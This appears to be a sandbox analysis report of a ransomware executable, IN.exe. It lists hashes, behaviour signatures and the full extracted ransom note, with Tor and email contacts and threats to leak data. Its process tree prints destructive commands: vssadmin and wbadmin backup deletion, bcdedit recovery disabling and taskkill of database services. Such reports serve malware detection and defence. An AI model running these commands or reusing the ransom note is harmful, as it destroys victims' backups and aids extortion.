Overview

overview

10

Static

static

10

IN.exe

windows7-x64

10

IN.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    152s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-10-2023 14:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    IN.exe

  • Size

    340KB

  • MD5

    714870c33ba84e744b84b32e6e114ed9

  • SHA1

    840f442d4466713becdf72b88846871330ac38e7

  • SHA256

    51b8a283f87a95edb5e98125e5730bcf843fc7ec8fcdc175c8dc0ba3032e8a51

  • SHA512

    270c584cc9f696de3421429627a07bfbd7829a033cfdc16280e7e233e8ae09e2f1cd0341537a6b050811683d93a14a1465aa3ab96e9577c98ebea521faae65f2

  • SSDEEP

    6144:PNs9prB0CnszdPZxMzk1ukSXa9bnuDOeFdGpBP7ENf3zcfUE:y9RaPZxMzk1uBXa9bu2JeAfUE

Score
10/10
evasionpersistenceransomware

Malware Config

Extracted

Path

C:\odt\HOW_TO_BACK_FILES.html

Ransom Note
<html> <style type="text/css"> body { background-color: #f5f5f5; } h1, h3{ text-align: center; text-transform: uppercase; font-weight: normal; } /*---*/ .tabs1{ display: block; margin: auto; } .tabs1 .head{ text-align: center; float: top; padding: 0px; text-transform: uppercase; font-weight: normal; display: block; background: #81bef7; color: #DF0101; font-size: 30px; } .tabs1 .identi { font-size: 10px; text-align: center; float: top; padding: 15px; display: block; background: #81bef7; color: #DFDFDF; word-break: break-all; } .tabs .content { background: #f5f5f5; /*text-align: center;*/ color: #000000; padding: 25px 15px; font-size: 15px; font-weight: 400; line-height: 20px; } .tabs .content a { color: #df0130; font-size: 23px; font-style: italic; text-decoration: none; line-height: 35px; } .tabs .content .text{ padding: 25px; line-height: 1.2; } </style> <body> <div class="tabs1"> <div class="head" ><b>Your personal ID:</b></div> <div class="identi"> <span style="width:1000px; color: #ffffff; font-size: 10px;">{{IDENTIFIER}}</span> <br> <!-- !!! dont changing this !!! --> </div> </div> <!-- --> <div class="tabs"> <!--tab--> <div class="tab"> <div id="tab-content1" class="content"> <div class="text"> <!--text data --> <b>/!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\</b><br> <b>All your important files have been encrypted!</b><br><br> <hr> Your files are safe! Only modified. (RSA+AES)<br><br> ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE<br> WILL PERMANENTLY CORRUPT IT.<br> DO NOT MODIFY ENCRYPTED FILES.<br> DO NOT RENAME ENCRYPTED FILES.<br><br> No software available on internet can help you. We are the only ones able to<br> solve your problem.<br><br> We gathered highly confidential/personal data. These data are currently stored on<br> a private server. This server will be immediately destroyed after your payment.<br> If you decide to not pay, we will release your data to public or re-seller.<br> So you can expect your data to be publicly available in the near future..<br><br> We only seek money and our goal is not to damage your reputation or prevent<br> your business from running.<br><br> You will can send us 2-3 non-important files and we will decrypt it for free<br> to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>Contact us for price and get decryption software.</b><br><br> <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion</a><br> * Note that this server is available via Tor browser only<br><br> Follow the instructions to open the link:<br> 1. Type the addres "https://www.torproject.org" in your Internet browser. It opens the Tor site.<br> 2. Press "Download Tor", then press "Download Tor Browser Bundle", install and run it.<br> 3. Now you have Tor browser. In the Tor Browser open <a>qd7pcafncosqfqu3ha6fcx4h6sr7tzwagzpcdcnytiw3b6varaeqv5yd.onion<br> </a> 4. Start a chat and follow the further instructions. <br> <hr> <b>If you can not use the above link, use the email:</b><br> <a href="[email protected] ">[email protected] </a> <br> <a href="[email protected] ">[email protected] </a> <br> <p>* To contact us, create a new free email account on the site: <a href="https://protonmail.com">protonmail.com <br> <b> IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER.</b><br> </div> </div> </div> <!--tab--> <!--text data --> </div> </div> <!--tab--> </div> </div> </body> </html>

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Renames multiple (4413) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

    ransomware
  • Deletes System State backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Deletes system backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

    ransomware
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Kills process with taskkill 14 IoCs
    evasion
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 36 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
    evasion
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3192
      • C:\Users\Admin\AppData\Local\Temp\IN.exe
        "C:\Users\Admin\AppData\Local\Temp\IN.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Adds Run key to start application
        • Enumerates connected drives
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        • System policy modification
        PID:4772
        • C:\Windows\SysWOW64\cmd.exe
          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill \"SQL\"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1228
          • C:\Windows\system32\cmd.exe
            C:\Windows\sysnative\cmd.exe /c rem Kill \"SQL\"
            4⤵
              PID:5032
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3640
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4196
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sqlbrowser.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:332
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1848
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2288
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sql writer.exe
                5⤵
                • Kills process with taskkill
                PID:2608
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1760
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3692
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sqlserv.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4944
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2392
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4280
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im msmdsrv.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4028
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2312
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1280
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im MsDtsSrvr.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:232
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3712
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3156
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im sqlceip.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4476
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4872
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3812
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im fdlauncher.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3880
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4276
            • C:\Windows\system32\cmd.exe
              C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3872
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im Ssms.exe
                5⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4928
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
            3⤵
              PID:2232
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
                4⤵
                  PID:3472
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im SQLAGENT.EXE
                    5⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2044
              • C:\Windows\SysWOW64\cmd.exe
                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
                3⤵
                  PID:1524
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
                    4⤵
                      PID:220
                      • C:\Windows\system32\taskkill.exe
                        taskkill -f -im fdhost.exe
                        5⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2320
                  • C:\Windows\SysWOW64\cmd.exe
                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
                    3⤵
                      PID:5084
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
                        4⤵
                          PID:788
                      • C:\Windows\SysWOW64\cmd.exe
                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
                        3⤵
                          PID:1592
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
                            4⤵
                              PID:2692
                          • C:\Windows\SysWOW64\cmd.exe
                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
                            3⤵
                              PID:916
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
                                4⤵
                                  PID:1796
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill -f -im pg_ctl.exe
                                    5⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4452
                              • C:\Windows\SysWOW64\cmd.exe
                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
                                3⤵
                                  PID:2276
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
                                    4⤵
                                      PID:2876
                                      • C:\Windows\system32\taskkill.exe
                                        taskkill -f -impostgres.exe
                                        5⤵
                                        • Kills process with taskkill
                                        PID:3152
                                  • C:\Windows\SysWOW64\cmd.exe
                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
                                    3⤵
                                      PID:3932
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
                                        4⤵
                                          PID:2336
                                          • C:\Windows\system32\net.exe
                                            net stop MSSQLServerADHelper100
                                            5⤵
                                              PID:3732
                                              • C:\Windows\system32\net1.exe
                                                C:\Windows\system32\net1 stop MSSQLServerADHelper100
                                                6⤵
                                                  PID:3180
                                          • C:\Windows\SysWOW64\cmd.exe
                                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
                                            3⤵
                                              PID:4348
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
                                                4⤵
                                                  PID:1616
                                                  • C:\Windows\system32\net.exe
                                                    net stop MSSQL$ISARS
                                                    5⤵
                                                      PID:4944
                                                      • C:\Windows\system32\net1.exe
                                                        C:\Windows\system32\net1 stop MSSQL$ISARS
                                                        6⤵
                                                          PID:4128
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
                                                    3⤵
                                                      PID:1764
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
                                                        4⤵
                                                          PID:3188
                                                          • C:\Windows\system32\net.exe
                                                            net stop MSSQL$MSFW
                                                            5⤵
                                                              PID:4028
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 stop MSSQL$MSFW
                                                                6⤵
                                                                  PID:3480
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
                                                            3⤵
                                                              PID:3780
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
                                                                4⤵
                                                                  PID:3468
                                                                  • C:\Windows\system32\net.exe
                                                                    net stop SQLAgent$ISARS
                                                                    5⤵
                                                                      PID:4008
                                                                      • C:\Windows\system32\net1.exe
                                                                        C:\Windows\system32\net1 stop SQLAgent$ISARS
                                                                        6⤵
                                                                          PID:4308
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
                                                                    3⤵
                                                                      PID:440
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
                                                                        4⤵
                                                                          PID:4604
                                                                          • C:\Windows\system32\net.exe
                                                                            net stop SQLAgent$MSFW
                                                                            5⤵
                                                                              PID:1464
                                                                              • C:\Windows\system32\net1.exe
                                                                                C:\Windows\system32\net1 stop SQLAgent$MSFW
                                                                                6⤵
                                                                                  PID:824
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
                                                                            3⤵
                                                                              PID:648
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
                                                                                4⤵
                                                                                  PID:2252
                                                                                  • C:\Windows\system32\net.exe
                                                                                    net stop SQLBrowser
                                                                                    5⤵
                                                                                      PID:464
                                                                                      • C:\Windows\system32\net1.exe
                                                                                        C:\Windows\system32\net1 stop SQLBrowser
                                                                                        6⤵
                                                                                          PID:2812
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
                                                                                    3⤵
                                                                                      PID:4132
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
                                                                                        4⤵
                                                                                          PID:2332
                                                                                          • C:\Windows\system32\net.exe
                                                                                            net stop REportServer$ISARS
                                                                                            5⤵
                                                                                              PID:1696
                                                                                              • C:\Windows\system32\net1.exe
                                                                                                C:\Windows\system32\net1 stop REportServer$ISARS
                                                                                                6⤵
                                                                                                  PID:2460
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
                                                                                            3⤵
                                                                                              PID:4672
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
                                                                                                4⤵
                                                                                                  PID:220
                                                                                                  • C:\Windows\system32\net.exe
                                                                                                    net stop SQLWriter
                                                                                                    5⤵
                                                                                                      PID:4152
                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                        C:\Windows\system32\net1 stop SQLWriter
                                                                                                        6⤵
                                                                                                          PID:3876
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                                                    3⤵
                                                                                                      PID:980
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                                                        4⤵
                                                                                                          PID:1300
                                                                                                          • C:\Windows\system32\wbadmin.exe
                                                                                                            wbadmin delete backup -keepVersion:0 -quiet
                                                                                                            5⤵
                                                                                                            • Deletes system backups
                                                                                                            PID:2196
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
                                                                                                        3⤵
                                                                                                          PID:544
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
                                                                                                            4⤵
                                                                                                              PID:4452
                                                                                                              • C:\Windows\system32\vssadmin.exe
                                                                                                                vssadmin.exe Delete Shadows /All /Quiet
                                                                                                                5⤵
                                                                                                                • Interacts with shadow copies
                                                                                                                PID:3204
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                            3⤵
                                                                                                              PID:3288
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                4⤵
                                                                                                                  PID:916
                                                                                                                  • C:\Windows\system32\bcdedit.exe
                                                                                                                    bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                    5⤵
                                                                                                                    • Modifies boot configuration data using bcdedit
                                                                                                                    PID:1488
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
                                                                                                                3⤵
                                                                                                                  PID:1868
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
                                                                                                                    4⤵
                                                                                                                      PID:3676
                                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                                        bcdedit.exe /set {default} recoverynabled No
                                                                                                                        5⤵
                                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                                        PID:2584
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                                                    3⤵
                                                                                                                      PID:5084
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                                                        4⤵
                                                                                                                          PID:2876
                                                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                            wmic.exe SHADOWCOPY /nointeractive
                                                                                                                            5⤵
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:4480
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                        3⤵
                                                                                                                          PID:4120
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                          3⤵
                                                                                                                            PID:4320
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                              4⤵
                                                                                                                                PID:4752
                                                                                                                                • C:\Windows\system32\wbadmin.exe
                                                                                                                                  wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                                  5⤵
                                                                                                                                  • Deletes System State backups
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  PID:2336
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IN.exe
                                                                                                                            \\?\C:\Users\Admin\AppData\Local\Temp\IN.exe -network
                                                                                                                            2⤵
                                                                                                                            • Adds Run key to start application
                                                                                                                            • System policy modification
                                                                                                                            PID:4156
                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                          taskkill -f -im ReportingServicesService.exe
                                                                                                                          1⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2176
                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                          taskkill -f -im msftesql.exe
                                                                                                                          1⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1224
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                          1⤵
                                                                                                                            PID:2152
                                                                                                                            • C:\Windows\system32\wbadmin.exe
                                                                                                                              wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                              2⤵
                                                                                                                                PID:3756
                                                                                                                            • C:\Windows\system32\vssvc.exe
                                                                                                                              C:\Windows\system32\vssvc.exe
                                                                                                                              1⤵
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:3396

                                                                                                                            Network

                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                            Replay Monitor

                                                                                                                            Loading Replay Monitor...

                                                                                                                            Downloads

                                                                                                                            • C:\Program Files\Java\jdk1.8.0_66\db\bin\NetworkServerControl
                                                                                                                              Filesize

                                                                                                                              7KB

                                                                                                                              MD5

                                                                                                                              28a6afd89f9337d301dfb35a6817414c

                                                                                                                              SHA1

                                                                                                                              116f3cb33941467b9c4e71284a9f96ae10004746

                                                                                                                              SHA256

                                                                                                                              23ad790a1817e1d514bd4a3b4b9dcd6bd140afc7cc7ae630db4631910df7806c

                                                                                                                              SHA512

                                                                                                                              da4ee7a2045f482cbc5e347b638384d4d5617480def4ed9e64df829099ce37671f015cb8ed283627aba0bcfa704070e5215fa05a92f97e9f76b7e2940befc5ad

                                                                                                                              Download Submit

                                                                                                                            • C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif
                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              2dcb29e20dec2736c8798632db3cc75b

                                                                                                                              SHA1

                                                                                                                              6f1555f49711e4ef92bcd158c7451ede94a8155e

                                                                                                                              SHA256

                                                                                                                              5735519631074e9c8042b53a5fc7a93630b5b4f8263aad0d6d47853d4836ce42

                                                                                                                              SHA512

                                                                                                                              c8ef8508a7d672a27ca1c83fee0e60e4f34478906e6851fa85c5d4b6e0863e09eeface7b6ba9f3696b31935fa2d9137c8120fcdf3b7d994ac57f2461368c62f2

                                                                                                                              Download Submit

                                                                                                                            • C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf
                                                                                                                              Filesize

                                                                                                                              1KB

                                                                                                                              MD5

                                                                                                                              87f94e12bb84df29dbab343e0c53a0ed

                                                                                                                              SHA1

                                                                                                                              043e0f833667dbbfb3191ef9c7e53a7acddd9cba

                                                                                                                              SHA256

                                                                                                                              fac1745022f03639377217e5969f977f0129ab6a21c415acc9972b7cb1162280

                                                                                                                              SHA512

                                                                                                                              e227dab5dd9b643aad0eb11768f65a0ef46eafff31046e0c2fc0c420adb897691614db3cd6a3677f1d361a71ba7c4235d0206fc294a9a2939b80e5454bdd4b87

                                                                                                                              Download Submit

                                                                                                                            • C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html
                                                                                                                              Filesize

                                                                                                                              13KB

                                                                                                                              MD5

                                                                                                                              fea781b1796bdfe4e3a4847dd3456d88

                                                                                                                              SHA1

                                                                                                                              450b14cfc9c7cebc75831f7bbca8ee14b49ea4e0

                                                                                                                              SHA256

                                                                                                                              6858fec11fce03065e63b607faf2871faeabcec4f0508cc18fc4fa39f95337f4

                                                                                                                              SHA512

                                                                                                                              e1ba24bb86d654fff00fdc9b20fda2d01fe378717a38242968759a48a9f7224386301a7caa65529d9edac610b7d0d3af586f4f54fb1beee1832363c8211e6139

                                                                                                                              Download Submit

                                                                                                                            • C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html
                                                                                                                              Filesize

                                                                                                                              10KB

                                                                                                                              MD5

                                                                                                                              4d199889d2ea955dad481d26b2ccba07

                                                                                                                              SHA1

                                                                                                                              4214537ab79144a5308a20789cac0d71031d31cd

                                                                                                                              SHA256

                                                                                                                              926484930167651b2a765f0b8e49a3e313f4bcad41c1410663741f8aec636404

                                                                                                                              SHA512

                                                                                                                              e407acdf1ab1ce70e3045e4a4337802eeaf692e82286f65f2e14d3f58f0e7aaf56771d97b8ab31cdb62bf72291e9f1dfafd3afb6a7eb3e143813ba817be56ed2

                                                                                                                              Download Submit

                                                                                                                            • C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA
                                                                                                                              Filesize

                                                                                                                              9KB

                                                                                                                              MD5

                                                                                                                              4d928959b99041df39bddaaaf5ed43d2

                                                                                                                              SHA1

                                                                                                                              0370630d91d7c86486a29acac6fceae81d38b7ad

                                                                                                                              SHA256

                                                                                                                              ae5298011bb700c82082b176009c89e47c1d5c4d617b464c9ba4de8aec4190f5

                                                                                                                              SHA512

                                                                                                                              baa7fdc1f41bded76cb5fa50ace1b8f5a2abd5a9c379fcbda26f016f6385f9d97f054bb3e463ead0a50832aa467f84cc1c00514e83f27d3850b2074a20ca71c1

                                                                                                                              Download Submit

                                                                                                                            • C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt
                                                                                                                              Filesize

                                                                                                                              12KB

                                                                                                                              MD5

                                                                                                                              0981b86ee2087f4ca974b8aa4e8c4f0b

                                                                                                                              SHA1

                                                                                                                              f190c9a8b4238b6ba27b917a12c56ec0816e4b13

